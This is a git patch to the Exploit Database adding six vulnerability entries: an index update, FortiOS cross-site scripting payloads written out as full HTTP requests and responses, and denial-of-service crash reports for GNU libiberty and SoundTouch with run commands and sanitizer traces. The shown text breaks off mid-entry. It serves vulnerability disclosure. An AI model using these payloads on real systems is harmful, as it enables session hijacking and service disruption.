From fb7bed6364479e9f046b4ba41877eda131df7233 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 29 Jul 2017 05:01:21 +0000 Subject: [PATCH] DB: 2017-07-29 6 new exploits GNU libiberty - Buffer Overflow SoundTouch 1.9.2 - Multiple Vulnerabilities LAME 3.99.5 - Multiple Vulnerabilities libjpeg-turbo 1.5.1 - Denial of Service Joomla! Component com_ccnewsletter - Directory Traversal Joomla! Component CCNewsLetter - Directory Traversal Joomla! Component com_ccnewsletter - Local File Inclusion Joomla! Component CCNewsLetter - Local File Inclusion Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection FortiOS < 5.6.0 - Cross-Site Scripting --- files.csv | 10 +- platforms/hardware/webapps/42388.txt | 168 +++++++++++++++++++++ platforms/linux/dos/42386.txt | 16 ++ platforms/linux/dos/42389.txt | 210 +++++++++++++++++++++++++++ platforms/linux/dos/42390.txt | 191 ++++++++++++++++++++++++ platforms/linux/dos/42391.txt | 141 ++++++++++++++++++ platforms/php/webapps/42387.txt | 44 ++++++ 7 files changed, 778 insertions(+), 2 deletions(-) create mode 100755 platforms/hardware/webapps/42388.txt create mode 100755 platforms/linux/dos/42386.txt create mode 100755 platforms/linux/dos/42389.txt create mode 100755 platforms/linux/dos/42390.txt create mode 100755 platforms/linux/dos/42391.txt create mode 100755 platforms/php/webapps/42387.txt diff --git a/files.csv b/files.csv index f376482aa..a37229cbe 100644 --- a/files.csv +++ b/files.csv @@ -5625,6 +5625,10 @@ id,file,description,date,author,platform,type,port 42375,platforms/multiple/dos/42375.html,"WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy",2017-07-25,"Google Security Research",multiple,dos,0 42376,platforms/multiple/dos/42376.html,"WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling",2017-07-25,"Google Security Research",multiple,dos,0 42377,platforms/multiple/dos/42377.txt,"WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free",2017-07-25,"Google Security Research",multiple,dos,0 +42386,platforms/linux/dos/42386.txt,"GNU libiberty - Buffer Overflow",2017-07-27,"Marcel Böhme",linux,dos,0 +42389,platforms/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0 +42390,platforms/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0 +42391,platforms/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -22872,11 +22876,11 @@ id,file,description,date,author,platform,type,port 11270,platforms/php/webapps/11270.txt,"Joomla! Component VirtueMart Module Customers_who_bought - SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0 11271,platforms/php/webapps/11271.txt,"Joomla! Component com_virtuemart - order_status_id SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0 11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,php,webapps,0 -11277,platforms/php/webapps/11277.txt,"Joomla! Component com_ccnewsletter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0 +11277,platforms/php/webapps/11277.txt,"Joomla! Component CCNewsLetter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0 11278,platforms/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps,0 11279,platforms/php/webapps/11279.txt,"Joomla! Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 11280,platforms/php/webapps/11280.txt,"Joomla! Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 -11282,platforms/php/webapps/11282.txt,"Joomla! Component com_ccnewsletter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0 +11282,platforms/php/webapps/11282.txt,"Joomla! Component CCNewsLetter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0 11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0 11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 @@ -38186,3 +38190,5 @@ id,file,description,date,author,platform,type,port 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0 +42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0 +42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0 diff --git a/platforms/hardware/webapps/42388.txt b/platforms/hardware/webapps/42388.txt new file mode 100755 index 000000000..2a5147ffd --- /dev/null +++ b/platforms/hardware/webapps/42388.txt @@ -0,0 +1,168 @@ +# Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities +# Vendor: Fortinet (www.fortinet.com) +# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133 +# Date: 28.07.2016 +# Author: Patryk Bogdan (@patryk_bogdan) + +Affected FortiNet products: +* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0 +* CVE-2017-3132 : FortiOS versions upto 5.6.0 +* CVE-2017-3133 : FortiOS versions upto 5.6.0 + +Fix: +Upgrade to FortiOS version 5.6.1 + +Video PoC (add admin): +https://youtu.be/fcpLStCD61Q + +Vendor advisory: +https://fortiguard.com/psirt/FG-IR-17-104 + + +Vulns: + +1. XSS in WEB UI - Applications: + +URL: +https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y + +Http request: +GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +Http response: +HTTP/1.1 200 OK +Date: Thu, 23 Mar 2017 12:07:47 GMT +Server: xxxxxxxx-xxxxx +Cache-Control: no-cache +Pragma: no-cache +Expires: -1 +Vary: Accept-Encoding +Content-Length: 6150 +Connection: close +Content-Type: text/html; charset=utf-8 +X-Frame-Options: SAMEORIGIN +Content-Security-Policy: frame-ancestors 'self' +X-UA-Compatible: IE=Edge +(...) + +(...) + + +2. XSS in WEB UI - Assign Token: + +URL: +https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E + +Http request: +GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +Http response: +HTTP/1.1 200 OK +Date: Thu, 23 Mar 2017 13:39:17 GMT +Server: xxxxxxxx-xxxxx +Content-Security-Policy: frame-ancestors 'self' +Expires: Thu, 23 Mar 2017 13:39:17 GMT +Vary: Cookie,Accept-Encoding +Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT +X-UA-Compatible: IE=Edge +Cache-Control: max-age=0 +X-FRAME-OPTIONS: SAMEORIGIN +Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/ +Connection: close +Content-Type: text/html; charset=utf-8 +Content-Length: 3485 +(...) + + +(...) + + +3. Stored XSS in WEB UI - Replacement Messages: + +#1 - Http request: +POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff +X-Requested-With: XMLHttpRequest +Content-Length: 125 +Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D +DNT: 1 +Connection: close + +csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A + +#1 - Http response: +HTTP/1.1 302 FOUND +Date: Thu, 23 Mar 2017 15:36:33 GMT +Server: xxxxxxxx-xxxxx +Content-Security-Policy: frame-ancestors 'self' +Expires: Thu, 23 Mar 2017 15:36:33 GMT +Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT +Cache-Control: max-age=0 +X-FRAME-OPTIONS: SAMEORIGIN +X-UA-Compatible: IE=Edge +Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/ +Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ +Connection: close +Content-Type: text/html; charset=utf-8 +Content-Length: 0 + +#2 - Http request: +GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff +X-Requested-With: XMLHttpRequest +Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D +DNT: 1 +Connection: close + +#2 - Http response: +HTTP/1.1 200 OK +Date: Thu, 23 Mar 2017 15:36:33 GMT +Server: xxxxxxxx-xxxxx +Content-Security-Policy: frame-ancestors 'self' +Expires: Thu, 23 Mar 2017 15:36:33 GMT +Vary: Cookie,Accept-Encoding +Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT +X-UA-Compatible: IE=Edge +Cache-Control: max-age=0 +X-FRAME-OPTIONS: SAMEORIGIN +Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/ +Connection: close +Content-Type: text/html; charset=utf-8 +Content-Length: 70940 +(...) +
+
+ + +(...) \ No newline at end of file diff --git a/platforms/linux/dos/42386.txt b/platforms/linux/dos/42386.txt new file mode 100755 index 000000000..94b64a07a --- /dev/null +++ b/platforms/linux/dos/42386.txt @@ -0,0 +1,16 @@ +Source: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687 + + +The attached program binary causes a buffer overflow in cplus-dem.c when it tries to demangle specially crafted function arguments in the binary. Both the buffer size as well as the buffer content are controlled from the binary. + +objdump -x -C +nm -C + +Tested on the following configurations +* 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 22:00:00 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux +* 4.1.12-boot2docker #1 SMP Tue Nov 3 06:03:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux +* Binutils versions: 2.20 and 2.26 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42386.zip diff --git a/platforms/linux/dos/42389.txt b/platforms/linux/dos/42389.txt new file mode 100755 index 000000000..13ed5a6af --- /dev/null +++ b/platforms/linux/dos/42389.txt @@ -0,0 +1,210 @@ +SoundTouch multiple vulnerabilities +================ +Author : qflb.wu +=============== + + +Introduction: +============= +SoundTouch is an open-source audio processing library for changing the Tempo, Pitch and Playback Rates of audio streams or audio files. The library additionally supports estimating stable beats-per-minute rates for audio tracks. + + +Affected version: +===== +1.9.2 + + +Vulnerability Description: +========================== +1. +the TDStretch::processSamples function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(infinite loop and CPU consumption) via a crafted wav file. + + +./soundstretch SoundTouch_1.9.2_infinite_loop.wav out + + +POC: +SoundTouch_1.9.2_infinite_loop.wav +CVE: +CVE-2017-9258 + + +2. +the TDStretch::acceptNewOverlapLength function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(memory allocation error and application crash) via a crafted wav file. + + +./soundstretch SoundTouch_1.9.2_memory_allocation_error.wav out + + +==87485==ERROR: AddressSanitizer failed to allocate 0x16103e000 (5922611200) bytes of LargeMmapAllocator: 12 +==87485==Process memory map follows: +0x000000400000-0x0000004c7000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch +0x0000006c7000-0x0000006c8000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch +0x0000006c8000-0x0000006ca000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch +0x0000006ca000-0x000001b0e000 +0x00007fff7000-0x00008fff7000 +0x00008fff7000-0x02008fff7000 +0x02008fff7000-0x10007fff8000 +0x600000000000-0x603000000000 +0x603000000000-0x603000010000 +0x603000010000-0x604000000000 +0x604000000000-0x604000010000 +0x604000010000-0x608000000000 +0x608000000000-0x608000010000 +0x608000010000-0x60b000000000 +0x60b000000000-0x60b000010000 +0x60b000010000-0x60e000000000 +0x60e000000000-0x60e000010000 +0x60e000010000-0x611000000000 +0x611000000000-0x611000010000 +0x611000010000-0x615000000000 +0x615000000000-0x615000020000 +0x615000020000-0x616000000000 +0x616000000000-0x616000020000 +0x616000020000-0x619000000000 +0x619000000000-0x619000020000 +0x619000020000-0x61e000000000 +0x61e000000000-0x61e000020000 +0x61e000020000-0x621000000000 +0x621000000000-0x621000020000 +0x621000020000-0x624000000000 +0x624000000000-0x624000020000 +0x624000020000-0x640000000000 +0x640000000000-0x640000003000 +0x7fdf6b253000-0x7fdf6d756000 +0x7fdf6d756000-0x7fdf6d914000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6d914000-0x7fdf6db13000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6db13000-0x7fdf6db17000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6db17000-0x7fdf6db19000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6db19000-0x7fdf6db1e000 +0x7fdf6db1e000-0x7fdf6db34000/lib/x86_64-linux-gnu/libgcc_s.so.1 +0x7fdf6db34000-0x7fdf6dd33000/lib/x86_64-linux-gnu/libgcc_s.so.1 +0x7fdf6dd33000-0x7fdf6dd34000/lib/x86_64-linux-gnu/libgcc_s.so.1 +0x7fdf6dd34000-0x7fdf6de1a000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6de1a000-0x7fdf6e019000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6e019000-0x7fdf6e021000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6e021000-0x7fdf6e023000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6e023000-0x7fdf6e038000 +0x7fdf6e038000-0x7fdf6e03b000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e03b000-0x7fdf6e23a000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e23a000-0x7fdf6e23b000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e23b000-0x7fdf6e23c000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e23c000-0x7fdf6e243000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e243000-0x7fdf6e442000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e442000-0x7fdf6e443000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e443000-0x7fdf6e444000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e444000-0x7fdf6e45d000/lib/x86_64-linux-gnu/libpthread-2.19.so +0x7fdf6e45d000-0x7fdf6e65c000/lib/x86_64-linux-gnu/libpthread-2.19.so +0x7fdf6e65c000-0x7fdf6e65d000/lib/x86_64-linux-gnu/libpthread-2.19.so +0x7fdf6e65d000-0x7fdf6e65e000/lib/x86_64-linux-gnu/libpthread-2.19.so +0x7fdf6e65e000-0x7fdf6e662000 +0x7fdf6e662000-0x7fdf6e767000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e767000-0x7fdf6e966000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e966000-0x7fdf6e967000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e967000-0x7fdf6e968000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e968000-0x7fdf6e9bd000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6e9bd000-0x7fdf6ebbd000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6ebbd000-0x7fdf6ebbe000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6ebbe000-0x7fdf6ebc1000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6ebc1000-0x7fdf6ebe4000/lib/x86_64-linux-gnu/ld-2.19.so +0x7fdf6edb1000-0x7fdf6edc8000 +0x7fdf6edca000-0x7fdf6edd7000 +0x7fdf6edda000-0x7fdf6ede3000 +0x7fdf6ede3000-0x7fdf6ede4000/lib/x86_64-linux-gnu/ld-2.19.so +0x7fdf6ede4000-0x7fdf6ede5000/lib/x86_64-linux-gnu/ld-2.19.so +0x7fdf6ede5000-0x7fdf6ede6000 +0x7ffcb0503000-0x7ffcb0524000[stack] +0x7ffcb05a4000-0x7ffcb05a6000[vvar] +0x7ffcb05a6000-0x7ffcb05a8000[vdso] +0xffffffffff600000-0xffffffffff601000[vsyscall] +==87485==End of process memory map. +==87485==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0) + #0 0x46da6f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46da6f) + #1 0x4732d1 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x4732d1) + #2 0x477b9e in __sanitizer::MmapOrDie(unsigned long, char const*) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x477b9e) + #3 0x433278 in __sanitizer::LargeMmapAllocator<__asan::AsanMapUnmapCallback>::Allocate(__sanitizer::AllocatorStats*, unsigned long, unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x433278) + #4 0x42f2bb in __asan::Allocate(unsigned long, unsigned long, __sanitizer::StackTrace*, __asan::AllocType, bool) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x42f2bb) + #5 0x46824d in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46824d) + #6 0x7fdf6e993d8e in soundtouch::TDStretch::acceptNewOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:724 + #7 0x7fdf6e993d8e in soundtouch::TDStretch::calculateOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:1008 + #8 0x7fdf6e9901f0 in soundtouch::TDStretch::setParameters(int, int, int, int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:158 + #9 0x7fdf6e998910 in soundtouch::TDStretch::setChannels(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:599 + #10 0x47f825 in setup(soundtouch::SoundTouch*, WavInFile const*, RunParameters const*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:127 + #11 0x47f825 in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:310 + #12 0x7fdf6d777f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #13 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac) + + + POC: + SoundTouch_1.9.2_infinite_loop.wav + CVE: + CVE-2017-9259 + + + 3. + the TDStretchSSE::calcCrossCorr function in source/SoundTouch/sse_optimized.cpp in SoundTouch 1.9.2 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file. + + +./soundstretch SoundTouch_1.9.2_heap_buffer_overflow.wav out + + +==87598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000007110 at pc 0x7f5076e3c3dc bp 0x7ffda7a42e10 sp 0x7ffda7a42e08 +READ of size 16 at 0x625000007110 thread T0 + #0 0x7f5076e3c3db in soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&) /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120:35 + #1 0x7f5076e1f0f9 in soundtouch::TDStretch::seekBestOverlapPositionFull(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:305 + #2 0x7f5076e1ee2c in soundtouch::TDStretch::seekBestOverlapPosition(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:258 + #3 0x7f5076e21e88 in soundtouch::TDStretch::processSamples() /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:659 + #4 0x7f5076e12893 in soundtouch::FIFOSamplePipe::moveSamples(soundtouch::FIFOSamplePipe&) /home/a/Downloads/soundtouch/source/SoundTouch/../../include/FIFOSamplePipe.h:88 + #5 0x7f5076e12893 in soundtouch::SoundTouch::putSamples(float const*, unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/SoundTouch.cpp:334 + #6 0x480f5e in process(soundtouch::SoundTouch*, WavInFile*, WavOutFile*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:200 + #7 0x480f5e in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:314 + #8 0x7f5075c00f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #9 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac) + + +0x625000007110 is located 0 bytes to the right of 8208-byte region [0x625000005100,0x625000007110) +allocated by thread T0 here: + #0 0x468209 in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x468209) + #1 0x7f5076e055db in soundtouch::FIFOSampleBuffer::ensureCapacity(unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/FIFOSampleBuffer.cpp:174 + + +SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120 soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&) +Shadow bytes around the buggy address: + 0x0c4a7fff8dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c4a7fff8e20: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + ASan internal: fe +==87598==ABORTING + + +POC: 